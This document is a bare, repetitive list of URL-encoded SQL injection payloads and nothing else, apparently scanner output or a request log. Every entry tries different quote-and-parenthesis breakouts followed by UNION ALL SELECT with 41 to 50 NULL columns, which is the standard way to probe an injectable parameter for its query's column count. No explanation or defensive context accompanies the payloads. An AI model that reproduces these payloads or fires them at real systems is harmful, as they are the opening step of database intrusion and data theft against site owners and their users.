1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 